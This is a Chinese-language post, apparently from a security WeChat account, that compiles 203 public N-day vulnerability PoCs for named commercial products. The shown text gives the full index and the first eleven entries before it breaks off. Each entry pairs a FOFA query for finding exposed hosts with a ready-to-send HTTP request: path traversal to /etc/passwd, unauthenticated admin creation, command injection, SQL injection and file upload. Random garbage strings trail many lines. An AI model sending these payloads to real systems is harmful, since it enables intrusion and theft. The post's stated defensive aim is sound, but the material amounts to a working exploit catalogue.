互联网公开漏洞整理202309-202406$ M* V- I) b. H7 u$ b1 A
道一安全 2024-06-05 07:41 北京
2 m5 k" u! V2 g& z& a, T: c以下文章来源于网络安全新视界 ,作者网络安全新视界* \% C6 E' m- ~+ }8 S( r
! w# e8 d; g2 n$ o5 M4 @
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
, w% ]" V E- ~( q: F2 Q, K: ]/ d4 q- e ~9 U) j q) x
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。' _6 v2 O2 i; G" c6 @
: [$ `7 U& [$ E( _
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。6 U: [& l2 `3 n7 y9 J4 `$ J
$ _' k/ c d% x" x8 a% v
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
( i. J, K! d. M, C. w; D0 B& |0 @* ~" T. ^) G
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。# I0 M2 k `" f9 S; u) C, A( [
5 h2 O: h2 h; e" o+ _+ C3 G
0 X' E1 Q) @8 Q% x+ X声明, N0 x0 g8 |" ]# U% q" ?5 T, [
3 S3 o5 f* e6 X
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
7 m4 c) E. j" `/ Y! u! {: P4 h& m2 Y. Y8 ^* M6 n* S
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。( w# {' Z- T( ~1 [+ E0 x
5 S7 {. s6 H# X$ d8 @
! N; c) M1 V. I/ B1 s' R4 V- @: A" I% C! }% H& X
目录
/ `- M6 f! k1 z" B# D% m* D6 j2 J# S8 C$ J
01
8 A1 U. I( s1 b- U$ w- D- w. i& Q5 W5 r1 Q+ e
1. StarRocks MPP数据库未授权访问& H) n; v, u% e
2. Casdoor系统static任意文件读取8 {) k" D8 R; m; K- U1 V, h
3. EasyCVR智能边缘网关 userlist 信息泄漏) t. X" h9 k5 l. p' l5 y7 {
4. EasyCVR视频管理平台存在任意用户添加9 ~, m/ x1 D7 o* c: A
5. NUUO NVR 视频存储管理设备远程命令执行: a* ?7 T; [) f d
6. 深信服 NGAF 任意文件读取
4 g: F: _! ~0 W1 f7. 鸿运主动安全监控云平台任意文件下载
! [5 J% G$ S0 O# ]8. 斐讯 Phicomm 路由器RCE/ i2 m1 |, t7 E& @+ r) q% j
9. 稻壳CMS keyword 未授权SQL注入
2 U L7 e! C) K' M7 E2 d" F10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 r& N. v8 v) a" h$ L W
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
6 y5 P. ^( d; L8 H- e3 S# H12. Jorani < 1.0.2 远程命令执行3 ~' {+ V3 R1 X, s
13. 红帆iOffice ioFileDown任意文件读取
: u. Y6 T# i6 y14. 华夏ERP(jshERP)敏感信息泄露2 K& n q% T0 m# H
15. 华夏ERP getAllList信息泄露
7 J7 a1 o3 d/ G16. 红帆HFOffice医微云SQL注入
5 T& x- L6 G" W: v4 W& [: H; A+ p( @17. 大华 DSS itcBulletin SQL 注入
$ n) G/ M; Q4 A3 T% J3 M18. 大华 DSS 数字监控系统 user_edit.action 信息泄露+ A) C2 u4 I' B( M8 E1 [( P
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) N" O3 e4 u' W0 c3 b# U1 u* J) s! F
20. 大华ICC智能物联综合管理平台任意文件读取7 |8 ~- F! z1 h) \: e; |8 m
21. 大华ICC智能物联综合管理平台random远程代码执行, v& U, _( E& l: w* z+ o
22. 大华ICC智能物联综合管理平台 log4j远程代码执行- e. l$ o9 `6 _( t" m: S. [% [
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行( G6 Y. y4 R- Y2 T; I+ g
24. 用友NC 6.5 accept.jsp任意文件上传
3 d* P. n* X* L/ m25. 用友NC registerServlet JNDI 远程代码执行
0 K& b5 Z0 }4 I: j/ W% {26. 用友NC linkVoucher SQL注入# T1 H6 g, ^" K& d6 N
27. 用友 NC showcontent SQL注入$ y" ^( \% C/ W
28. 用友NC grouptemplet 任意文件上传' L* Q2 g" ]# c6 t4 U- Z
29. 用友NC down/bill SQL注入
1 y- w5 a/ b) r2 m4 {0 L" V30. 用友NC importPml SQL注入
, E7 S: L7 j/ N4 o" ?" L9 X31. 用友NC runStateServlet SQL注入3 H$ a: E5 j0 r/ [* T& ^
32. 用友NC complainbilldetail SQL注入4 Y2 B' x5 ~, D+ y! q+ j; j
33. 用友NC downTax/download SQL注入7 S ]# D! u4 d
34. 用友NC warningDetailInfo接口SQL注入
& m/ O+ O2 S' r+ @- K7 U35. 用友NC-Cloud importhttpscer任意文件上传2 A# B- A+ @) J- S9 d' ?2 V
36. 用友NC-Cloud soapFormat XXE' L, d( @/ _( q/ c- |3 u$ D' S
37. 用友NC-Cloud IUpdateService XXE
! \% y1 D2 w H% w$ Q" `38. 用友U8 Cloud smartweb2.RPC.d XXE
# T/ v2 m3 V q( i: S39. 用友U8 Cloud RegisterServlet SQL注入) N3 d% y0 |, E
40. 用友U8-Cloud XChangeServlet XXE
6 w4 t3 }, t' r5 l41. 用友U8 Cloud MeasureQueryByToolAction SQL注入5 Y6 A. y: ] m3 H# B7 O
42. 用友GRP-U8 SmartUpload01 文件上传
/ P! Y8 f# }, R) {' @* K# p; V3 u43. 用友GRP-U8 userInfoWeb SQL注入致RCE) f& |* c( v) x, G6 n+ L# l- j( l# w
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* a% _& g+ U4 O/ X3 ~45. 用友GRP-U8 ufgovbank XXE
P/ }8 d6 ^) t; I7 b46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( h9 C% m+ n# P! m# N7 N47. 用友GRP A++Cloud 政府财务云 任意文件读取
) _: y/ x; T' ^% V48. 用友U8 CRM swfupload 任意文件上传
7 Z5 i1 b3 S' H% m1 y49. 用友U8 CRM系统uploadfile.php接口任意文件上传0 i8 h$ ?5 {1 F' \) G! x
50. QDocs Smart School 6.4.1 filterRecords SQL注入" J0 r4 ^5 P' j0 T4 ^% ?5 `
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
4 ^0 v0 G: L2 e' D/ m# m52. 泛微E-Office json_common.php sql注入 ?, b8 }2 [/ C! E# D' m8 s( a0 _& H
53. 迪普 DPTech VPN Service 任意文件上传0 o: v1 g8 E' i) B' [# ?
54. 畅捷通T+ getstorewarehousebystore 远程代码执行! R" k a2 w: d) R) R
55. 畅捷通T+ getdecallusers信息泄露7 u6 l+ M8 i$ ^! Q8 V' U8 B
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE3 [& ~# B& I3 e% a. g# I
57. 畅捷通T+ keyEdit.aspx SQL注入- t! j# [. k7 r- V, f
58. 畅捷通T+ KeyInfoList.aspx sql注入
" M$ ~- ^2 j; F4 \8 a- P m6 B59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行! j: m. c" u% J; U) p
60. 百卓Smart管理平台 importexport.php SQL注入
, f. ~' v6 T3 k5 k9 [3 g61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
/ F/ A7 @/ F- o62. IP-guard WebServer 远程命令执行. t1 P; ^5 d: ?' {' l1 j1 b% K
63. IP-guard WebServer任意文件读取
9 R4 o. h& T" X& v: V1 I7 V# [64. 捷诚管理信息系统CWSFinanceCommon SQL注入: `8 h$ G% Q0 y! ~
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
: Y+ ]% Z0 \2 r( W66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入0 V: @) \/ { m0 E' e' A* [
67. 万户ezOFFICE wpsservlet任意文件上传0 u' c6 K* g/ ~2 r
68. 万户ezOFFICE wf_printnum.jsp SQL注入
/ p4 G! M) H4 T7 R6 z0 C69. 万户 ezOFFICE contract_gd.jsp SQL注入
3 }/ Z6 a+ I) x7 h70. 万户ezEIP success 命令执行$ `7 k$ T" c. i
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
+ s- T; h& n7 x! B8 B" W) U2 a: e72. 致远OA getAjaxDataServlet XXE
: t2 s+ F8 l$ J. K% [73. GeoServer wms远程代码执行
3 o% ?" L) j* S9 s# M. C74. 致远M3-server 6_1sp1 反序列化RCE( U# i' V0 B. _7 F$ p
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: V; Z" W$ b) [' C
76. 新开普掌上校园服务管理平台service.action远程命令执行% O) j5 C0 u# j# {& N
77. F22服装管理软件系统UploadHandler.ashx任意文件上传5 C6 J& S% j8 i( Z" ^) l
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
( @% Y3 X7 ]5 N79. BYTEVALUE 百为流控路由器远程命令执行
J8 B) q4 M& `( V80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传! x8 f7 g0 J' v/ g" s4 h
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
# O3 G5 i" g) t82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行" g9 _8 I# z2 L8 }3 O# w% O( b
83. JeecgBoot testConnection 远程命令执行
7 i' Y& q0 Z" A' N) N4 F* O, i' w2 |84. Jeecg-Boot JimuReport queryFieldBySql 模板注入* H* {9 w: K" k- w- G: R- v/ [
85. SysAid On-premise< 23.3.36远程代码执行7 @' b( V: T6 `/ o
86. 日本tosei自助洗衣机RCE" Q) b. ], G7 I2 g) ]3 S8 v
87. 安恒明御安全网关aaa_local_web_preview文件上传
2 l& d' `( \0 `. i) J88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 M3 N; |$ _) D' V8 O7 n2 Q89. 致远互联FE协作办公平台editflow_manager存在sql注入
3 H! |% C5 k' k5 I7 e. B' ~- G2 P9 {90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
" o, T: E. B; p91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ R0 F% a9 m w2 o/ Q
92. 海康威视运行管理中心session命令执行
5 p5 R* i5 L T93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传$ ]& o: \& A h" o
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 ^2 D& }, r/ X* E u5 R4 t% I" C95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行/ d" W. A3 a# w7 Z- Y$ [$ G' z* J
96. Apache OFBiz 18.12.11 groovy 远程代码执行, j& O9 v1 T" V' o" |2 F* y- b8 t, w, `
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行! ^) G- ~. @( Q1 w( ]' D
98. SpiderFlow爬虫平台远程命令执行
6 A7 s5 I6 G6 K7 v. {6 {8 ^99. Ncast盈可视高清智能录播系统busiFacade RCE
6 B5 I4 J- I' _, f+ f$ f100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传3 |* r4 o7 Y/ C `& [
101. ivanti policy secure-22.6命令注入( j4 n- U- K4 F0 E8 [8 @
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
5 R: k2 v5 V2 g103. Ivanti Pulse Connect Secure VPN XXE
* M* \/ R2 l; y c* Q: j' }104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露+ ^& n, {; n/ F# N0 \+ k- z- K% r
105. SpringBlade v3.2.0 export-user SQL 注入
: _" s' P! z4 S! s; d, W106. SpringBlade dict-biz/list SQL 注入3 X% w6 B4 B. T: H4 X
107. SpringBlade tenant/list SQL 注入5 g" l+ e8 }5 H! [0 ], z( D3 a
108. D-Tale 3.9.0 SSRF% Q2 {% o# T8 @7 D8 z
109. Jenkins CLI 任意文件读取. a4 H2 c) I- u3 Z7 [4 t
110. Goanywhere MFT 未授权创建管理员
% P% v% q4 E- b# @; e6 J+ ^$ M8 C3 V111. WordPress Plugin HTML5 Video Player SQL注入
9 y" j8 v- Q' n! k112. WordPress Plugin NotificationX SQL 注入
: h+ ~+ }* |' t1 H113. WordPress Automatic 插件任意文件下载和SSRF
7 c/ ~( L0 t! @9 \1 `) \114. WordPress MasterStudy LMS插件 SQL注入) ]- @! r0 z! D" x0 e4 |
115. WordPress Bricks Builder <= 1.9.6 RCE
% b$ Z* m8 u( `( v& H' l116. wordpress js-support-ticket文件上传! w& R! a# ^/ X, [9 G) B" b
117. WordPress LayerSlider插件SQL注入
1 i& X1 c1 b$ L9 X0 @0 M118. 北京百绰智能S210管理平台uploadfile.php任意文件上传# p V7 _" z5 y; e) e
119. 北京百绰智能S20后台sysmanageajax.php sql注入3 V# L: p; q1 \. O
120. 北京百绰智能S40管理平台导入web.php任意文件上传/ y) A+ o( u. q$ f% c
121. 北京百绰智能S42管理平台userattestation.php任意文件上传) q+ `, x- n& J# _% S3 g+ n
122. 北京百绰智能s200管理平台/importexport.php sql注入" N& b3 ?$ [8 D" x! ?
123. Atlassian Confluence 模板注入代码执行
" Y0 Q6 O# y$ W( j124. 湖南建研工程质量检测系统任意文件上传
0 O% e9 b) f* I/ ]; d9 ^# z* b125. ConnectWise ScreenConnect身份验证绕过
" x2 D0 I" j' J, ^* k1 a126. Aiohttp 路径遍历
/ L# J3 N2 O# }/ n" B$ [) Z; _. h" \127. 广联达Linkworks DataExchange.ashx XXE
; U7 E( V9 ~9 t. ]& H$ I2 q" B128. Adobe ColdFusion 反序列化
5 I8 e h2 x% V* h7 s! b/ \129. Adobe ColdFusion 任意文件读取
' ~0 v" B4 a0 E8 U130. Laykefu客服系统任意文件上传4 {+ |& J- h7 F- h/ f$ {
131. Mini-Tmall <=20231017 SQL注入1 v& D9 u$ v9 T& y
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过5 Z+ L* T: _8 S+ X
133. H5 云商城 file.php 文件上传
5 W. h7 f1 }" [: e134. 网康NS-ASG应用安全网关index.php sql注入: S- k* L; o I+ [" _1 V
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
9 y+ U0 m( T& i136. NextChat cors SSRF
" }$ k3 m! A% V [137. 福建科立迅通信指挥调度平台down_file.php sql注入8 H- b o- U: i
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 \( m0 R: y- a3 M9 Y5 g2 h3 v2 e139. 福建科立讯通信指挥调度平台editemedia.php sql注入
: \+ \- S$ m, p! ]140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入$ I- b1 o2 | J& I
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
0 S; q9 f* S6 g' ~8 `142. CMSV6车辆监控平台系统中存在弱密码7 L% ?; ^5 T' b1 N
143. Netis WF2780 v2.1.40144 远程命令执行+ _$ e, H x2 @. k$ j/ e
144. D-Link nas_sharing.cgi 命令注入
% p2 p$ `% K' w145. Palo Alto Networks PAN-OS GlobalProtect 命令注入+ ~8 L% n1 u; b% G/ b! i
146. MajorDoMo thumb.php 未授权远程代码执行( f d$ v! C5 `5 y
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历7 ?, r0 e6 X' u
148. CrushFTP 认证绕过模板注入
+ P" F0 e) u& K& a$ R6 K D149. AJ-Report开源数据大屏存在远程命令执行 m/ o9 a, y, q+ K
150. AJ-Report 1.4.0 认证绕过与远程代码执行" i$ Y( B, I) y# l$ @+ g
151. AJ-Report 1.4.1 pageList sql注入
8 w5 [- I+ Z! F152. Progress Kemp LoadMaster 远程命令执行
% L8 c/ l. i+ K, T& t0 J' x+ C153. gradio任意文件读取
; Z; H# F; z1 J" |2 m154. 天维尔消防救援作战调度平台 SQL注入* g6 h* F% S) @$ t% v) B
155. 六零导航页 file.php 任意文件上传5 R( Y1 t3 l* Q, j& G$ \
156. TBK DVR-4104/DVR-4216 操作系统命令注入
; S2 r( o: a+ u! p; }: u157. 美特CRM upload.jsp 任意文件上传6 m* E! S1 P5 r- t. w8 {0 o0 l
158. Mura-CMS-processAsyncObject存在SQL注入
u! n% I K+ J159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
2 v% @. |) N n( ~160. Sonatype Nexus Repository 3目录遍历与文件读取- r! K9 |5 A ?/ Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
; n+ |. O$ ?0 F. j: g. l. P162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传' U6 W- C5 j$ s; Q& W8 T
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
$ q `- S$ i) ^ e164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- u6 F) w2 k+ d4 p. R- X
165. OrangeHRM 3.3.3 SQL 注入4 O# b3 k# f& \2 Q6 }: o6 u* N3 [
166. 中成科信票务管理平台SeatMapHandler SQL注入
# M$ C p4 T* r+ H# X) J4 W& o167. 精益价值管理系统 DownLoad.aspx任意文件读取, y+ f& a$ S6 K; w: k# p
168. 宏景EHR OutputCode 任意文件读取2 o7 m" c# v9 T/ d2 u( r" K
169. 宏景EHR downlawbase SQL注入* I9 l* m/ Q& e1 H$ ~, ^0 s. t. `
170. 宏景EHR DisplayExcelCustomReport 任意文件读取, k0 u- g9 y+ b: b
171. 通天星CMSV6车载定位监控平台 SQL注入9 e5 Q. d/ w- Y u6 E9 {
172. DT-高清车牌识别摄像机任意文件读取
{8 _+ U Y% h0 y" a$ e173. Check Point 安全网关任意文件读取
0 A( k' H# o* {% Y" O174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 G/ }' U8 T" i3 t175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入9 x6 [2 [" L2 r! d* _6 T
176. 电信网关配置管理系统 rewrite.php 文件上传
6 f! N9 v2 c- d' D177. H3C路由器敏感信息泄露0 z% p7 x/ N/ x& m1 g* W! a f
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
3 K# F" k5 d% H9 {179. 建文工程管理系统存在任意文件读取
. W7 s" f5 A0 I6 l9 x7 t0 ]8 ]! K% e180. 帮管客 CRM jiliyu SQL注入
* B' B4 C2 @3 [/ I9 j181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入2 W+ ]% q6 h+ R g1 j
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% {: d5 V( M9 u+ G# l+ N; D
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
2 s8 e# q9 ^' p5 g: S184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加! Y* A4 m8 k) m' V, d% c
185. 瑞友天翼应用虚拟化系统SQL注入
9 R5 T3 [# I9 g6 w8 B1 O* V3 u186. F-logic DataCube3 SQL注入, g( u) A3 A- U% J
187. Mura CMS processAsyncObject SQL注入
2 J8 N6 i! \$ `( l+ Y/ N2 s188. 叁体-佳会视频会议 attachment 任意文件读取, b% Z" h$ w% h8 M5 |1 m' x
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
/ L3 A; y7 l" |; s! s( G190. 短视频矩阵营销系统 poihuoqu 任意文件读取& i) P* Y9 i$ [1 C9 r( V
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
# M2 ~" e/ }& x0 w8 D0 F192. 富通天下外贸ERP UploadEmailAttr 任意文件上传+ ^/ W: C, n# M! l( x
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* s, D, B7 c6 ^, L194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传: g) J8 D$ C( ]" d. a8 n4 M0 p; s; b
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 J1 o8 K, b# V2 F% _8 m* m2 s+ V
196. 河南省风速科技统一认证平台密码重置
3 ?- k6 H8 E2 r/ E4 C; E* i8 H4 h197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入 V h5 s/ z! V, b' f0 i# s. q# Y
198. 阿里云盘 WebDAV 命令注入
3 M8 |$ ]) N' T3 f6 D9 m! G; |) R" \199. cockpit系统assetsmanager_upload接口 文件上传( G% A) R; L2 _# b% U7 E% y
200. SeaCMS海洋影视管理系统dmku SQL注入
# o2 Z- k# I" u7 g' |+ e9 _; q) K201. 方正全媒体新闻采编系统 binary SQL注入, U6 P! X4 }% p* o
202. 微擎系统 AccountEdit任意文件上传( c8 @, {1 Y% ~% l( Q9 s
203. 红海云EHR PtFjk 文件上传/ A) R! s$ A2 z+ j i
6 p- o- M0 {- NPOC列表$ N/ G! |1 |% p/ a p9 s: s
: L d4 ^) j% D$ V024 k L( y: \; M a
5 |% q( d* C( {1. StarRocks MPP数据库未授权访问
U+ c4 W$ n6 X2 [- rFOFA :title="StarRocks"
8 s f! Y5 n6 `: y1 f, i$ V4 OGET /mem_tracker HTTP/1.1$ h; b7 W6 p8 d- f. j& J2 ~$ {( ~
Host: URL
; d6 E. T' j% x& R( e8 V6 x
# W8 P% `3 e4 f( M9 h* P3 `% j# g9 r) l6 n% \& O
2. Casdoor系统static任意文件读取# D8 B: r9 y/ A) g3 Q. j
FOFA :title="Casdoor"
+ p- {& z: R* S* N0 N6 S, S. |, SGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 c4 B2 D6 G5 F3 uHost: xx.xx.xx.xx:9999
# n7 ~1 G# P' i4 [2 s; q, DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 \9 J9 l8 q- y# i; _& Q
Connection: close0 ?" [# u p+ C: }( C
Accept: */*. i# G* Z0 k( s3 ^0 |8 F( e$ o
Accept-Language: en7 ^0 i; X \9 N* \
Accept-Encoding: gzip
, ^1 |. s0 q G9 M( ?4 l& r" h) K$ C) y$ @& A' v5 U+ n' `9 v
9 o/ k2 V/ J Y) n) M& u3 J+ F3. EasyCVR智能边缘网关 userlist 信息泄漏
3 |2 O) d8 r4 D+ X- JFOFA :title="EasyCVR"$ p/ }! W E, Z+ Y- h% j3 X" c
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
% T. k. k6 w% |. H' y9 p- a5 zHost: xx.xx.xx.xx4 k9 k4 X( w5 j
; @! \7 k- w3 A+ J2 f
. Y% s! L3 O: E" E7 T
4. EasyCVR视频管理平台存在任意用户添加
& i7 u" M7 }6 o8 R7 X( RFOFA :title="EasyCVR". `4 S m2 I$ ?+ n) ^6 s
* j/ N( c! n; S: w' K
password更改为自己的密码md5
: {' ?# f9 S1 N2 K( ePOST /api/v1/adduser HTTP/1.1- D! R. F/ w/ d- }# k; C
Host: your-ip
e. u7 N+ Q! w. [# n& RContent-Type: application/x-www-form-urlencoded; charset=UTF-8) s. k3 j$ k9 e. Y! N: h7 e
. ^: m. m% A4 a$ a% i) G. iname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1, L4 l# t H& ^/ z' d! d& {% H1 A
, C) x$ a; s) T
8 W; N2 b, v" o4 M5. NUUO NVR 视频存储管理设备远程命令执行
% x% |+ O( E) e: H; D+ iFOFA:title="Network Video Recorder Login"; j0 w7 P8 t) B! G/ y
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" b7 u8 g" U. n U n) h7 t+ x4 I M
Host: xx.xx.xx.xx0 g. ?# `0 b3 p- M: ?2 u
) V! Y3 n& F3 ]6 G5 S: r) ]& h
7 q: Y6 I0 ]! \! _1 ]
6. 深信服 NGAF 任意文件读取
6 D1 j; m$ l% W* VFOFA:title="SANGFOR | NGAF"* w, M$ l; w7 t5 y( k2 O
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.14 E' `" j& i9 Q& U+ U; f; n
Host:
' F! I& ]8 q; e* R2 ?2 z6 A
% }$ q6 o- K7 r9 B' T8 ^% J: U; z! N
7. 鸿运主动安全监控云平台任意文件下载
) k& @' e5 W( Y: ]" Z. |FOFA:body="./open/webApi.html"& C( m& j* y# ?# s, g, |8 u
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
& h$ B! J5 u' m) bHost:1 A- d! _0 ]( k% {, |
|5 j1 U* }, C4 G* R
+ n: n9 z% G0 i$ z, o
8. 斐讯 Phicomm 路由器RCE
$ p& J" q* d- S: F* O2 C- dFOFA:icon_hash="-1344736688"
' v1 j( Q. B. j7 G* ]# L' q! P默认账号admin登录后台后,执行操作
6 z$ G1 @) I# e" I. e- q" L" _POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
4 p, E# h5 E( R) ? D+ ~Host: x.x.x.x
/ b3 b3 z, q) b1 m! P, WCookie: sysauth=第一步登录获取的cookie
3 y6 x+ u& a! s. ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz+ B6 [3 X8 X! Z% {. k- _1 |, A) g
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. g c" Z2 a( z t. J* o O" i: j
% k8 j" U6 x- j9 g% C8 g; ?
------WebKitFormBoundaryxbgjoytz
1 n6 r# i2 p5 h( Q7 x6 w( T, C0 KContent-Disposition: form-data; name="wifiRebootEnablestatus"
: F. J2 v, ?# ]$ k+ M7 |0 s: K$ K X# y) L: ?* G* ^% e* u3 D
%s
9 z9 l- ]+ k6 M+ h: ~3 k" W ]. r------WebKitFormBoundaryxbgjoytz8 @ F+ p& T& r0 k' Y, F5 ^
Content-Disposition: form-data; name="wifiRebootrange"* C" V* u% f3 p3 v9 ?8 r
/ y/ {& O1 b% ^: R) F
12:00; id;
! W) @4 [, W/ f( F8 {( ^1 V------WebKitFormBoundaryxbgjoytz( Z! Z6 I9 a2 D0 U
Content-Disposition: form-data; name="wifiRebootendrange"
! X- n* u0 c w# s: N3 t7 Q& p) I) B1 a
%s:
. z1 y9 r0 G- a, m" ?9 d/ \------WebKitFormBoundaryxbgjoytz
2 e: q* P0 N$ R' JContent-Disposition: form-data; name="cururl2" |2 S7 l4 B0 {- V
' q# ]+ L c5 E7 M$ i! L( }1 h
6 Z. w2 F- i# T. \
------WebKitFormBoundaryxbgjoytz--( A* b' q2 B2 M' G2 `" Z
6 `- ?8 u) Q8 B- ?, I* K5 g& ^+ Z1 {3 ?7 J
9. 稻壳CMS keyword 未授权SQL注入 Q& n8 g- z5 [2 Y: V' A) T
FOFA:app="Doccms"2 r* i# n$ Q- X4 O
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
- O( v5 r& ^" aHost: x.x.x.x! |- t$ ^( J, Y, |2 A
+ |6 s9 `3 m* s, [" I8 b
) d4 F0 P5 v4 c/ k* @; Apayload为下列语句的二次Url编码
+ f) ~7 G# C4 w& I! B8 C
: t/ A! x8 f# }' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
* I! s0 {/ r9 O( a! Q
' N" W) w" @' ?9 j7 X10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 p7 b3 U/ `2 l2 F/ }, K
FOFA:icon_hash="953405444"9 q' }, [% H; m
, m5 f) p; t. ]( `文件上传后响应中包含上传文件的路径) K! n m% U; m* S) y8 v7 c
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
( I5 j7 [. B7 ?5 jHost: x.x.x.x:xx
- G v2 m8 S, o% KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36# R& V/ A4 l4 z( d* U! ?; p
Content-Length: 197
|. A& Y2 w5 v, H. D `+ x4 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9* E, \) j6 R% q# E$ ?+ [
Accept-Encoding: gzip, deflate
; @4 S8 @$ \9 X" }9 O. kAccept-Language: zh-CN,zh;q=0.95 w( Q/ Z' }5 Y" l6 q
Connection: close* Y0 g/ K7 D$ {: j1 y/ m8 M1 ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu. u- h; i9 J+ ^2 H8 c6 i5 \
O, s) @; v3 F" I
------WebKitFormBoundaryxdgaqmqu
( G" u* X0 d, p0 t! j* ^Content-Disposition: form-data; name="file"filename="icfitnya.txt"
. P& `6 M) A6 z5 k3 @* y! x, J2 m# oContent-Type: text/html$ T6 d n$ W& @( T
6 W S, u( s1 k" ?- Yjmnqjfdsupxgfidopeixbgsxbf B' y9 v2 G9 `. v/ U6 l$ [
------WebKitFormBoundaryxdgaqmqu--
& ]% j; o9 S( z6 u m. T
4 g E: b& I+ ?( m
7 D/ X: Y# _( ?$ e7 p11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
) s% M* H% s8 h4 C) ?FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"+ J9 Z9 y# e/ s' s& O1 ^
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
